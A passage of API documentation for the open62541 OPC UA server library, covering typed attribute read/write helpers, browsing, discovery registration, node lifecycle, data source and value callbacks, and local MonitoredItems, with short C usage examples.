UA_Server_readDisplayName(UA_Server *server, const UA_NodeId nodeId,
UA_LocalizedText *outDisplayName) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_DISPLAYNAME,
outDisplayName);
}
static UA_INLINE UA_StatusCode
UA_Server_readDescription(UA_Server *server, const UA_NodeId nodeId,
UA_LocalizedText *outDescription) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_DESCRIPTION,
outDescription);
}
static UA_INLINE UA_StatusCode
UA_Server_readWriteMask(UA_Server *server, const UA_NodeId nodeId,
UA_UInt32 *outWriteMask) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_WRITEMASK,
outWriteMask);
}
static UA_INLINE UA_StatusCode
UA_Server_readIsAbstract(UA_Server *server, const UA_NodeId nodeId,
UA_Boolean *outIsAbstract) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_ISABSTRACT,
outIsAbstract);
}
static UA_INLINE UA_StatusCode
UA_Server_readSymmetric(UA_Server *server, const UA_NodeId nodeId,
UA_Boolean *outSymmetric) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_SYMMETRIC,
outSymmetric);
}
static UA_INLINE UA_StatusCode
UA_Server_readInverseName(UA_Server *server, const UA_NodeId nodeId,
UA_LocalizedText *outInverseName) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_INVERSENAME,
outInverseName);
}
static UA_INLINE UA_StatusCode
UA_Server_readContainsNoLoop(UA_Server *server, const UA_NodeId nodeId,
UA_Boolean *outContainsNoLoops) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_CONTAINSNOLOOPS,
outContainsNoLoops);
}
static UA_INLINE UA_StatusCode
UA_Server_readEventNotifier(UA_Server *server, const UA_NodeId nodeId,
UA_Byte *outEventNotifier) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_EVENTNOTIFIER,
outEventNotifier);
}
static UA_INLINE UA_StatusCode
UA_Server_readValue(UA_Server *server, const UA_NodeId nodeId,
UA_Variant *outValue) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_VALUE, outValue);
}
static UA_INLINE UA_StatusCode
UA_Server_readDataType(UA_Server *server, const UA_NodeId nodeId,
UA_NodeId *outDataType) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_DATATYPE,
outDataType);
}
static UA_INLINE UA_StatusCode
UA_Server_readValueRank(UA_Server *server, const UA_NodeId nodeId,
UA_Int32 *outValueRank) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_VALUERANK,
outValueRank);
}
/* Returns a variant with an int32 array */
static UA_INLINE UA_StatusCode
UA_Server_readArrayDimensions(UA_Server *server, const UA_NodeId nodeId,
UA_Variant *outArrayDimensions) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_ARRAYDIMENSIONS,
outArrayDimensions);
}
static UA_INLINE UA_StatusCode
UA_Server_readAccessLevel(UA_Server *server, const UA_NodeId nodeId,
UA_Byte *outAccessLevel) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_ACCESSLEVEL,
outAccessLevel);
}
static UA_INLINE UA_StatusCode
UA_Server_readMinimumSamplingInterval(UA_Server *server, const UA_NodeId nodeId,
UA_Double *outMinimumSamplingInterval) {
return __UA_Server_read(server, &nodeId,
UA_ATTRIBUTEID_MINIMUMSAMPLINGINTERVAL,
outMinimumSamplingInterval);
}
static UA_INLINE UA_StatusCode
UA_Server_readHistorizing(UA_Server *server, const UA_NodeId nodeId,
UA_Boolean *outHistorizing) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_HISTORIZING,
outHistorizing);
}
static UA_INLINE UA_StatusCode
UA_Server_readExecutable(UA_Server *server, const UA_NodeId nodeId,
UA_Boolean *outExecutable) {
return __UA_Server_read(server, &nodeId, UA_ATTRIBUTEID_EXECUTABLE,
outExecutable);
}
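The typed read helpers above can be used, for example, to read the current
time from the standard namespace zero (the node id
``UA_NS0ID_SERVER_SERVERSTATUS_CURRENTTIME`` is defined by the standard):

.. code-block:: c

   UA_Variant value;
   UA_Variant_init(&value);
   UA_StatusCode retval = UA_Server_readValue(server,
       UA_NODEID_NUMERIC(0, UA_NS0ID_SERVER_SERVERSTATUS_CURRENTTIME), &value);
   if(retval == UA_STATUSCODE_GOOD &&
      UA_Variant_hasScalarType(&value, &UA_TYPES[UA_TYPES_DATETIME])) {
       UA_DateTime now = *(UA_DateTime*)value.data;
       /* use 'now' ... */
   }
   UA_Variant_clear(&value);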
The following node attributes cannot be changed once a node has been created:
- NodeClass
- NodeId
- Symmetric
- ContainsNoLoop
The following attributes cannot be written from the server, as they are
specific to the different users and set by the access control callback:
- UserWriteMask
- UserAccessLevel
- UserExecutable
.. code-block:: c
/* Overwrite an attribute of a node. The specialized functions below provide a
* more concise syntax.
*
* @param server The server object.
* @param value WriteValues contain the NodeId of the target node, the id of the
 * attribute to be overwritten, the actual value and (optionally) an
 * index range to replace parts of an array only. See the section on
 * NumericRange for the format used for array ranges.
* @return Returns a status code. */
UA_StatusCode
UA_Server_write(UA_Server *server, const UA_WriteValue *value);
/* Don't use this function. There are typed versions with no additional
* overhead. */
UA_StatusCode
__UA_Server_write(UA_Server *server, const UA_NodeId *nodeId,
const UA_AttributeId attributeId,
const UA_DataType *attr_type, const void *attr);
static UA_INLINE UA_StatusCode
UA_Server_writeBrowseName(UA_Server *server, const UA_NodeId nodeId,
const UA_QualifiedName browseName) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_BROWSENAME,
&UA_TYPES[UA_TYPES_QUALIFIEDNAME], &browseName);
}
static UA_INLINE UA_StatusCode
UA_Server_writeDisplayName(UA_Server *server, const UA_NodeId nodeId,
const UA_LocalizedText displayName) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_DISPLAYNAME,
&UA_TYPES[UA_TYPES_LOCALIZEDTEXT], &displayName);
}
static UA_INLINE UA_StatusCode
UA_Server_writeDescription(UA_Server *server, const UA_NodeId nodeId,
const UA_LocalizedText description) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_DESCRIPTION,
&UA_TYPES[UA_TYPES_LOCALIZEDTEXT], &description);
}
static UA_INLINE UA_StatusCode
UA_Server_writeWriteMask(UA_Server *server, const UA_NodeId nodeId,
const UA_UInt32 writeMask) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_WRITEMASK,
&UA_TYPES[UA_TYPES_UINT32], &writeMask);
}
static UA_INLINE UA_StatusCode
UA_Server_writeIsAbstract(UA_Server *server, const UA_NodeId nodeId,
const UA_Boolean isAbstract) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_ISABSTRACT,
&UA_TYPES[UA_TYPES_BOOLEAN], &isAbstract);
}
static UA_INLINE UA_StatusCode
UA_Server_writeInverseName(UA_Server *server, const UA_NodeId nodeId,
const UA_LocalizedText inverseName) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_INVERSENAME,
&UA_TYPES[UA_TYPES_LOCALIZEDTEXT], &inverseName);
}
static UA_INLINE UA_StatusCode
UA_Server_writeEventNotifier(UA_Server *server, const UA_NodeId nodeId,
const UA_Byte eventNotifier) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_EVENTNOTIFIER,
&UA_TYPES[UA_TYPES_BYTE], &eventNotifier);
}
static UA_INLINE UA_StatusCode
UA_Server_writeValue(UA_Server *server, const UA_NodeId nodeId,
const UA_Variant value) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_VALUE,
&UA_TYPES[UA_TYPES_VARIANT], &value);
}
static UA_INLINE UA_StatusCode
UA_Server_writeDataType(UA_Server *server, const UA_NodeId nodeId,
const UA_NodeId dataType) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_DATATYPE,
&UA_TYPES[UA_TYPES_NODEID], &dataType);
}
static UA_INLINE UA_StatusCode
UA_Server_writeValueRank(UA_Server *server, const UA_NodeId nodeId,
const UA_Int32 valueRank) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_VALUERANK,
&UA_TYPES[UA_TYPES_INT32], &valueRank);
}
static UA_INLINE UA_StatusCode
UA_Server_writeArrayDimensions(UA_Server *server, const UA_NodeId nodeId,
const UA_Variant arrayDimensions) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_ARRAYDIMENSIONS,
&UA_TYPES[UA_TYPES_VARIANT], &arrayDimensions);
}
static UA_INLINE UA_StatusCode
UA_Server_writeAccessLevel(UA_Server *server, const UA_NodeId nodeId,
const UA_Byte accessLevel) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_ACCESSLEVEL,
&UA_TYPES[UA_TYPES_BYTE], &accessLevel);
}
static UA_INLINE UA_StatusCode
UA_Server_writeMinimumSamplingInterval(UA_Server *server, const UA_NodeId nodeId,
                                       const UA_Double minimumSamplingInterval) {
    return __UA_Server_write(server, &nodeId,
                             UA_ATTRIBUTEID_MINIMUMSAMPLINGINTERVAL,
                             &UA_TYPES[UA_TYPES_DOUBLE],
                             &minimumSamplingInterval);
}
static UA_INLINE UA_StatusCode
UA_Server_writeHistorizing(UA_Server *server, const UA_NodeId nodeId,
const UA_Boolean historizing) {
return __UA_Server_write(server, &nodeId,
UA_ATTRIBUTEID_HISTORIZING,
&UA_TYPES[UA_TYPES_BOOLEAN],
&historizing);
}
static UA_INLINE UA_StatusCode
UA_Server_writeExecutable(UA_Server *server, const UA_NodeId nodeId,
const UA_Boolean executable) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_EXECUTABLE,
                             &UA_TYPES[UA_TYPES_BOOLEAN], &executable);
}
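For example, writing a scalar value into a hypothetical variable node with the
string id ``"the.answer"`` in namespace 1 can be sketched as:

.. code-block:: c

   UA_Int32 myInteger = 42;
   UA_Variant value;
   UA_Variant_init(&value);
   /* No copy is made here; the variant points to the stack variable */
   UA_Variant_setScalar(&value, &myInteger, &UA_TYPES[UA_TYPES_INT32]);
   UA_Server_writeValue(server, UA_NODEID_STRING(1, "the.answer"), value);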
Browsing
--------
.. code-block:: c
/* Browse the references of a particular node. See the definition of
* BrowseDescription structure for details. */
UA_BrowseResult
UA_Server_browse(UA_Server *server, UA_UInt32 maxReferences,
const UA_BrowseDescription *bd);
UA_BrowseResult
UA_Server_browseNext(UA_Server *server, UA_Boolean releaseContinuationPoint,
const UA_ByteString *continuationPoint);
/* Nonstandard version of the browse service that recurses into child nodes.
* Possible loops (that can occur for non-hierarchical references) are handled
* by adding every target node at most once to the results array. */
UA_StatusCode
UA_Server_browseRecursive(UA_Server *server, const UA_BrowseDescription *bd,
size_t *resultsSize, UA_ExpandedNodeId **results);
UA_BrowsePathResult
UA_Server_translateBrowsePathToNodeIds(UA_Server *server,
const UA_BrowsePath *browsePath);
/* A simplified TranslateBrowsePathsToNodeIds based on the
* SimpleAttributeOperand type (Part 4, 7.4.4.5).
*
* This specifies a relative path using a list of BrowseNames instead of the
* RelativePath structure. The list of BrowseNames is equivalent to a
* RelativePath that specifies forward references which are subtypes of the
* HierarchicalReferences ReferenceType. All Nodes followed by the browsePath
* shall be of the NodeClass Object or Variable. */
UA_BrowsePathResult
UA_Server_browseSimplifiedBrowsePath(UA_Server *server, const UA_NodeId origin,
size_t browsePathSize,
const UA_QualifiedName *browsePath);
#ifndef HAVE_NODEITER_CALLBACK
#define HAVE_NODEITER_CALLBACK
/* Iterate over all nodes referenced by parentNodeId by calling the callback
* function for each child node (in ifdef because GCC/CLANG handle include order
* differently) */
typedef UA_StatusCode
(*UA_NodeIteratorCallback)(UA_NodeId childId, UA_Boolean isInverse,
UA_NodeId referenceTypeId, void *handle);
#endif
UA_StatusCode
UA_Server_forEachChildNodeCall(UA_Server *server, UA_NodeId parentNodeId,
UA_NodeIteratorCallback callback, void *handle);
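As a sketch, the following lists all forward references of the Objects folder
(passing ``0`` for ``maxReferences`` means no limit):

.. code-block:: c

   UA_BrowseDescription bd;
   UA_BrowseDescription_init(&bd);
   bd.nodeId = UA_NODEID_NUMERIC(0, UA_NS0ID_OBJECTSFOLDER);
   bd.browseDirection = UA_BROWSEDIRECTION_FORWARD;
   bd.resultMask = UA_BROWSERESULTMASK_ALL;

   UA_BrowseResult br = UA_Server_browse(server, 0, &bd);
   for(size_t i = 0; i < br.referencesSize; i++) {
       const UA_ReferenceDescription *rd = &br.references[i];
       /* inspect rd->browseName, rd->nodeId, ... */
   }
   UA_BrowseResult_clear(&br);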
#ifdef UA_ENABLE_DISCOVERY
Discovery
---------
.. code-block:: c
/* Register the given server instance at the discovery server.
* This should be called periodically.
* The semaphoreFilePath is optional. If the given file is deleted,
* the server will automatically be unregistered. This could be
* for example a pid file which is deleted if the server crashes.
*
* When the server shuts down you need to call unregister.
*
* @param server
* @param client the client which is used to call the RegisterServer. It must
* already be connected to the correct endpoint
* @param semaphoreFilePath optional parameter pointing to semaphore file. */
UA_StatusCode
UA_Server_register_discovery(UA_Server *server, struct UA_Client *client,
const char* semaphoreFilePath);
/* Unregister the given server instance from the discovery server.
* This should only be called when the server is shutting down.
* @param server
* @param client the client which is used to call the RegisterServer. It must
* already be connected to the correct endpoint */
UA_StatusCode
UA_Server_unregister_discovery(UA_Server *server, struct UA_Client *client);
/* Adds a periodic callback to register the server with the LDS (local discovery server)
* periodically. The interval between each register call is given as second parameter.
* It should be 10 minutes by default (= 10*60*1000).
*
* The delayFirstRegisterMs parameter indicates the delay for the first register call.
* If it is 0, the first register call will be after intervalMs milliseconds,
* otherwise the server's first register will be after delayFirstRegisterMs.
*
* When you manually unregister the server, you also need to cancel the
 * periodic callback, otherwise it will automatically be registered again.
*
* If you call this method multiple times for the same discoveryServerUrl, the older
* periodic callback will be removed.
*
* @param server
* @param client the client which is used to call the RegisterServer.
* It must not yet be connected and will be connected for every register call
* to the given discoveryServerUrl.
* @param discoveryServerUrl where this server should register itself.
* The string will be copied internally. Therefore you can free it after calling this method.
* @param intervalMs
* @param delayFirstRegisterMs
* @param periodicCallbackId */
UA_StatusCode
UA_Server_addPeriodicServerRegisterCallback(UA_Server *server, struct UA_Client *client,
const char* discoveryServerUrl,
UA_Double intervalMs,
UA_Double delayFirstRegisterMs,
UA_UInt64 *periodicCallbackId);
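Periodic registration can then be set up roughly as follows. The LDS endpoint
URL is an assumption, and the client must be configured (e.g. with the
``UA_ClientConfig_setDefault`` plugin helper) but not yet connected:

.. code-block:: c

   UA_Client *clientRegister = UA_Client_new();
   UA_ClientConfig_setDefault(UA_Client_getConfig(clientRegister));

   UA_UInt64 periodicCallbackId;
   UA_Server_addPeriodicServerRegisterCallback(server, clientRegister,
                                               "opc.tcp://localhost:4840",
                                               10 * 60 * 1000, /* every 10 min */
                                               500,            /* first after 500 ms */
                                               &periodicCallbackId);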
/* Callback for RegisterServer. Data is passed from the register call */
typedef void (*UA_Server_registerServerCallback)(const UA_RegisteredServer *registeredServer,
void* data);
/* Set the callback which is called if another server registers or unregisters
* with this instance. This callback is called every time the server gets a register
* call. This especially means that for every periodic server register the callback will
* be called.
*
* @param server
* @param cb the callback
 * @param data data passed to the callback */
void
UA_Server_setRegisterServerCallback(UA_Server *server, UA_Server_registerServerCallback cb,
void* data);
#ifdef UA_ENABLE_DISCOVERY_MULTICAST
/* Callback for server detected through mDNS. Data is passed from the register
* call
*
* @param isServerAnnounce indicates if the server has just been detected. If
* set to false, this means the server is shutting down.
* @param isTxtReceived indicates if we already received the corresponding TXT
* record with the path and caps data */
typedef void (*UA_Server_serverOnNetworkCallback)(const UA_ServerOnNetwork *serverOnNetwork,
UA_Boolean isServerAnnounce,
UA_Boolean isTxtReceived, void* data);
/* Set the callback which is called if another server is found through mDNS or
* deleted. It will be called for any mDNS message from the remote server, thus
* it may be called multiple times for the same instance. Also the SRV and TXT
* records may arrive later, therefore for the first call the server
* capabilities may not be set yet. If called multiple times, previous data will
* be overwritten.
*
* @param server
* @param cb the callback
 * @param data data passed to the callback */
void
UA_Server_setServerOnNetworkCallback(UA_Server *server,
UA_Server_serverOnNetworkCallback cb,
void* data);
#endif /* UA_ENABLE_DISCOVERY_MULTICAST */
#endif /* UA_ENABLE_DISCOVERY */
Information Model Callbacks
---------------------------
There are three places where a callback from an information model to
user-defined code can happen.
- Custom node constructors and destructors
- Linking VariableNodes with an external data source
- MethodNode callbacks
.. _node-lifecycle:
Node Lifecycle: Constructors, Destructors and Node Contexts
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
To finalize the instantiation of a node, a (user-defined) constructor
callback is executed. There can be both a global constructor for all nodes
and a node-type constructor specific to the TypeDefinition of the new node
(attached to an ObjectTypeNode or VariableTypeNode).
In the hierarchy of ObjectTypes and VariableTypes, only the constructor of
the (lowest) type defined for the new node is executed. Note that every
Object and Variable can have only one ``isTypeOf`` reference. But type-nodes
can technically have several ``hasSubType`` references to implement multiple
inheritance. Issues of (multiple) inheritance in the constructor need to be
solved by the user.
When a node is destroyed, the node-type destructor is called before the
global destructor. So the overall node lifecycle is as follows:
1. Global Constructor (set in the server config)
2. Node-Type Constructor (for VariableType or ObjectTypes)
3. (Usage-period of the Node)
4. Node-Type Destructor
5. Global Destructor
The constructor and destructor callbacks can be set to ``NULL`` and are not
used in that case. If the node-type constructor fails, the global destructor
will be called before removing the node. The destructors are assumed to never
fail.
Every node carries a user-context and a constructor-context pointer. The
user-context is used to attach custom data to a node. But the (user-defined)
constructors and destructors may replace the user-context pointer if they
wish to do so. The initial value for the constructor-context is ``NULL``.
When the ``AddNodes`` service is used over the network, the user-context
pointer of the new node is also initially set to ``NULL``.
.. code-block:: c
/* To be set in the server config. */
typedef struct {
/* Can be NULL. May replace the nodeContext */
UA_StatusCode (*constructor)(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *nodeId, void **nodeContext);
/* Can be NULL. The context cannot be replaced since the node is destroyed
* immediately afterwards anyway. */
void (*destructor)(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *nodeId, void *nodeContext);
/* Can be NULL. Called during recursive node instantiation. While mandatory
* child nodes are automatically created if not already present, optional child
* nodes are not. This callback can be used to define whether an optional child
* node should be created.
*
* @param server The server executing the callback
* @param sessionId The identifier of the session
* @param sessionContext Additional data attached to the session in the
* access control layer
* @param sourceNodeId Source node from the type definition. If the new node
* shall be created, it will be a copy of this node.
* @param targetParentNodeId Parent of the potential new child node
 * @param referenceTypeId Identifies the reference type that the parent
* node has to the new node.
 * @return Return UA_TRUE if the child node shall be instantiated,
* UA_FALSE otherwise. */
UA_Boolean (*createOptionalChild)(UA_Server *server,
const UA_NodeId *sessionId,
void *sessionContext,
const UA_NodeId *sourceNodeId,
const UA_NodeId *targetParentNodeId,
const UA_NodeId *referenceTypeId);
/* Can be NULL. Called when a node is to be copied during recursive
* node instantiation. Allows definition of the NodeId for the new node.
* If the callback is set to NULL or the resulting NodeId is UA_NODEID_NULL,
* then a random NodeId will be generated.
*
* @param server The server executing the callback
* @param sessionId The identifier of the session
* @param sessionContext Additional data attached to the session in the
* access control layer
* @param sourceNodeId Source node of the copy operation
* @param targetParentNodeId Parent node of the new node
 * @param referenceTypeId Identifies the reference type that the parent
* node has to the new node. */
UA_StatusCode (*generateChildNodeId)(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *sourceNodeId,
const UA_NodeId *targetParentNodeId,
const UA_NodeId *referenceTypeId,
UA_NodeId *targetNodeId);
} UA_GlobalNodeLifecycle;
typedef struct {
/* Can be NULL. May replace the nodeContext */
UA_StatusCode (*constructor)(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *typeNodeId, void *typeNodeContext,
const UA_NodeId *nodeId, void **nodeContext);
/* Can be NULL. May replace the nodeContext. */
void (*destructor)(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *typeNodeId, void *typeNodeContext,
const UA_NodeId *nodeId, void **nodeContext);
} UA_NodeTypeLifecycle;
UA_StatusCode
UA_Server_setNodeTypeLifecycle(UA_Server *server, UA_NodeId nodeId,
UA_NodeTypeLifecycle lifecycle);
UA_StatusCode
UA_Server_getNodeContext(UA_Server *server, UA_NodeId nodeId,
void **nodeContext);
/* Careful! The user has to ensure that the destructor callbacks still work. */
UA_StatusCode
UA_Server_setNodeContext(UA_Server *server, UA_NodeId nodeId,
void *nodeContext);
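A node-type lifecycle might be attached as in the following sketch; the type
node id ``pumpTypeId`` is a placeholder for a previously created ObjectType:

.. code-block:: c

   static UA_StatusCode
   pumpConstructor(UA_Server *server,
                   const UA_NodeId *sessionId, void *sessionContext,
                   const UA_NodeId *typeNodeId, void *typeNodeContext,
                   const UA_NodeId *nodeId, void **nodeContext) {
       /* Attach instance data; freed again in the destructor */
       *nodeContext = UA_malloc(sizeof(UA_UInt32));
       return (*nodeContext) ? UA_STATUSCODE_GOOD : UA_STATUSCODE_BADOUTOFMEMORY;
   }

   static void
   pumpDestructor(UA_Server *server,
                  const UA_NodeId *sessionId, void *sessionContext,
                  const UA_NodeId *typeNodeId, void *typeNodeContext,
                  const UA_NodeId *nodeId, void **nodeContext) {
       UA_free(*nodeContext);
       *nodeContext = NULL;
   }

   UA_NodeTypeLifecycle lifecycle = {pumpConstructor, pumpDestructor};
   UA_Server_setNodeTypeLifecycle(server, pumpTypeId, lifecycle);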
.. _datasource:
Data Source Callback
^^^^^^^^^^^^^^^^^^^^
The server has a unique way of dealing with the content of variables. Instead
of storing a variant attached to the variable node, the node can point to a
function with a local data provider. Whenever the value attribute is read,
the function will be called and asked to provide a UA_DataValue return value
that contains the value content and additional timestamps.
It is expected that the read callback is implemented. The write callback can
be set to a null-pointer.
.. code-block:: c
typedef struct {
/* Copies the data from the source into the provided value.
*
* !! ZERO-COPY OPERATIONS POSSIBLE !!
* It is not required to return a copy of the actual content data. You can
* return a pointer to memory owned by the user. Memory can be reused
* between read callbacks of a DataSource, as the result is already encoded
* on the network buffer between each read operation.
*
* To use zero-copy reads, set the value of the `value->value` Variant
* without copying, e.g. with `UA_Variant_setScalar`. Then, also set
* `value->value.storageType` to `UA_VARIANT_DATA_NODELETE` to prevent the
* memory being cleaned up. Don't forget to also set `value->hasValue` to
* true to indicate the presence of a value.
*
* @param server The server executing the callback
* @param sessionId The identifier of the session
* @param sessionContext Additional data attached to the session in the
* access control layer
* @param nodeId The identifier of the node being read from
* @param nodeContext Additional data attached to the node by the user
* @param includeSourceTimeStamp If true, then the datasource is expected to
* set the source timestamp in the returned value
* @param range If not null, then the datasource shall return only a
* selection of the (nonscalar) data. Set
* UA_STATUSCODE_BADINDEXRANGEINVALID in the value if this does not
* apply
* @param value The (non-null) DataValue that is returned to the client. The
* data source sets the read data, the result status and optionally a
* sourcetimestamp.
* @return Returns a status code for logging. Error codes intended for the
* original caller are set in the value. If an error is returned,
* then no releasing of the value is done
*/
UA_StatusCode (*read)(UA_Server *server, const UA_NodeId *sessionId,
void *sessionContext, const UA_NodeId *nodeId,
void *nodeContext, UA_Boolean includeSourceTimeStamp,
const UA_NumericRange *range, UA_DataValue *value);
/* Write into a data source. This method pointer can be NULL if the
* operation is unsupported.
*
* @param server The server executing the callback
* @param sessionId The identifier of the session
* @param sessionContext Additional data attached to the session in the
* access control layer
* @param nodeId The identifier of the node being written to
* @param nodeContext Additional data attached to the node by the user
* @param range If not NULL, then the datasource shall return only a
* selection of the (nonscalar) data. Set
* UA_STATUSCODE_BADINDEXRANGEINVALID in the value if this does not
* apply
* @param value The (non-NULL) DataValue that has been written by the client.
* The data source contains the written data, the result status and
* optionally a sourcetimestamp
* @return Returns a status code for logging. Error codes intended for the
* original caller are set in the value. If an error is returned,
* then no releasing of the value is done
*/
UA_StatusCode (*write)(UA_Server *server, const UA_NodeId *sessionId,
void *sessionContext, const UA_NodeId *nodeId,
void *nodeContext, const UA_NumericRange *range,
const UA_DataValue *value);
} UA_DataSource;
UA_StatusCode
UA_Server_setVariableNode_dataSource(UA_Server *server, const UA_NodeId nodeId,
const UA_DataSource dataSource);
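As a minimal sketch (the callback and NodeId names, ``readCurrentTime`` and
``currentTimeNodeId``, are illustrative and not part of the API), a read-only
data source can be registered like this:

.. code-block:: c

    /* Example read callback that reports the current server time */
    static UA_StatusCode
    readCurrentTime(UA_Server *server, const UA_NodeId *sessionId,
                    void *sessionContext, const UA_NodeId *nodeId,
                    void *nodeContext, UA_Boolean includeSourceTimeStamp,
                    const UA_NumericRange *range, UA_DataValue *value) {
        UA_DateTime now = UA_DateTime_now();
        UA_Variant_setScalarCopy(&value->value, &now,
                                 &UA_TYPES[UA_TYPES_DATETIME]);
        value->hasValue = true;
        if(includeSourceTimeStamp) {
            value->sourceTimestamp = now;
            value->hasSourceTimestamp = true;
        }
        return UA_STATUSCODE_GOOD;
    }

    /* Registration; the write callback is left as NULL (read-only) */
    UA_DataSource timeSource;
    timeSource.read = readCurrentTime;
    timeSource.write = NULL;
    UA_Server_setVariableNode_dataSource(server, currentTimeNodeId, timeSource);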
.. _value-callback:
Value Callback
^^^^^^^^^^^^^^
Value Callbacks can be attached to variable and variable type nodes. If
not ``NULL``, they are called before reading and after writing respectively.
.. code-block:: c
typedef struct {
/* Called before the value attribute is read. It is possible to write into the
* value attribute during onRead (using the write service). The node is
* re-opened afterwards so that changes are considered in the following read
* operation.
*
* @param handle Points to user-provided data for the callback.
* @param nodeid The identifier of the node.
* @param data Points to the current node value.
* @param range Points to the numeric range the client wants to read from
* (or NULL). */
void (*onRead)(UA_Server *server, const UA_NodeId *sessionId,
void *sessionContext, const UA_NodeId *nodeid,
void *nodeContext, const UA_NumericRange *range,
const UA_DataValue *value);
/* Called after writing the value attribute. The node is re-opened after
* writing so that the new value is visible in the callback.
*
* @param server The server executing the callback
* @param sessionId The identifier of the session
* @param sessionContext Additional data attached to the session
* in the access control layer
* @param nodeid The identifier of the node.
* @param nodeUserContext Additional data attached to the node by
* the user.
* @param nodeConstructorContext Additional data attached to the node
* by the type constructor(s).
* @param range Points to the numeric range the client wants to write to (or
* NULL). */
void (*onWrite)(UA_Server *server, const UA_NodeId *sessionId,
void *sessionContext, const UA_NodeId *nodeId,
void *nodeContext, const UA_NumericRange *range,
const UA_DataValue *data);
} UA_ValueCallback;
UA_StatusCode
UA_Server_setVariableNode_valueCallback(UA_Server *server,
const UA_NodeId nodeId,
const UA_ValueCallback callback);
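The following sketch attaches both callbacks to a variable (``myNodeId`` and
the callback names are illustrative; either pointer may also be ``NULL``):

.. code-block:: c

    static void
    beforeRead(UA_Server *server, const UA_NodeId *sessionId,
               void *sessionContext, const UA_NodeId *nodeid,
               void *nodeContext, const UA_NumericRange *range,
               const UA_DataValue *value) {
        /* Optionally refresh the value attribute (via the write service)
         * before it is read */
    }

    static void
    afterWrite(UA_Server *server, const UA_NodeId *sessionId,
               void *sessionContext, const UA_NodeId *nodeId,
               void *nodeContext, const UA_NumericRange *range,
               const UA_DataValue *data) {
        /* React to the freshly written value, e.g. forward it to a device */
    }

    UA_ValueCallback callback;
    callback.onRead = beforeRead;
    callback.onWrite = afterWrite;
    UA_Server_setVariableNode_valueCallback(server, myNodeId, callback);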
.. _local-monitoreditems:
Local MonitoredItems
^^^^^^^^^^^^^^^^^^^^
MonitoredItems are used with the Subscription mechanism of OPC UA to
transport notifications for data changes and events. MonitoredItems can
also be registered locally. Notifications are then forwarded to a
user-defined callback instead of a remote client.
.. code-block:: c
#ifdef UA_ENABLE_SUBSCRIPTIONS
typedef void (*UA_Server_DataChangeNotificationCallback)
(UA_Server *server, UA_UInt32 monitoredItemId, void *monitoredItemContext,
const UA_NodeId *nodeId, void *nodeContext, UA_UInt32 attributeId,
const UA_DataValue *value);
typedef void (*UA_Server_EventNotificationCallback)
(UA_Server *server, UA_UInt32 monId, void *monContext,
size_t nEventFields, const UA_Variant *eventFields);
/* Create a local MonitoredItem with a sampling interval that detects data
* changes.
*
* @param server The server executing the MonitoredItem
* @param timestampsToReturn Shall timestamps be added to the value for the callback?
* @param item The parameters of the new MonitoredItem. Note that the attribute of the
* ReadValueId (the node that is monitored) can not be
* ``UA_ATTRIBUTEID_EVENTNOTIFIER``. A different callback type needs to be
* registered for event notifications.
* @param monitoredItemContext A pointer that is forwarded with the callback
* @param callback The callback that is executed on detected data changes
*
* @return Returns a description of the created MonitoredItem. The structure
* also contains a StatusCode (in case of an error) and the identifier of the
* new MonitoredItem. */
UA_MonitoredItemCreateResult
UA_Server_createDataChangeMonitoredItem(UA_Server *server,
UA_TimestampsToReturn timestampsToReturn,
const UA_MonitoredItemCreateRequest item,
void *monitoredItemContext,
UA_Server_DataChangeNotificationCallback callback);
/* UA_MonitoredItemCreateResult */
/* UA_Server_createEventMonitoredItem(UA_Server *server, */
/* UA_TimestampsToReturn timestampsToReturn, */
/* const UA_MonitoredItemCreateRequest item, void *context, */
/* UA_Server_EventNotificationCallback callback); */
UA_StatusCode
UA_Server_deleteMonitoredItem(UA_Server *server, UA_UInt32 monitoredItemId);
#endif
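As a sketch, a local MonitoredItem on the value attribute of a node could be
set up as follows (``monitoredNodeId`` and the callback name are illustrative;
``UA_MonitoredItemCreateRequest_default`` is a convenience helper that
prepares a request for the value attribute):

.. code-block:: c

    static void
    dataChangeNotification(UA_Server *server, UA_UInt32 monitoredItemId,
                           void *monitoredItemContext, const UA_NodeId *nodeId,
                           void *nodeContext, UA_UInt32 attributeId,
                           const UA_DataValue *value) {
        /* React to the changed value here */
    }

    UA_MonitoredItemCreateRequest monRequest =
        UA_MonitoredItemCreateRequest_default(monitoredNodeId);
    monRequest.requestedParameters.samplingInterval = 100.0; /* in ms */
    UA_Server_createDataChangeMonitoredItem(server,
                                            UA_TIMESTAMPSTORETURN_SOURCE,
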